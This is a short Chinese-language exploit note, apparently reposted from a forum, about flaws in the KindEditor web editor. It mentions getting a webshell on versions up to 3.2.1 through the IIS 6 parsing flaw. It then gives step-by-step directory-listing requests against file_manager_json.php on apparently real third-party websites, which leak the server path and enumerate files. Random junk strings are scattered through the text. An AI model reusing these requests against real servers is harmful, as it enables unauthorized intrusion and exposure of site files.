影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版)
漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL
. S2 I4 \8 q" n8 {1 \' ^2 P, w, @1 p
0 W: u5 G( S8 g5 P7 u4 N
KindEditor列目录漏洞
测试版本:KindEditor 3.4.2 KindEditor 3.5.5
- http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名% j' D! h# \5 Z( e
4 j+ ?6 G9 q/ ]; c& g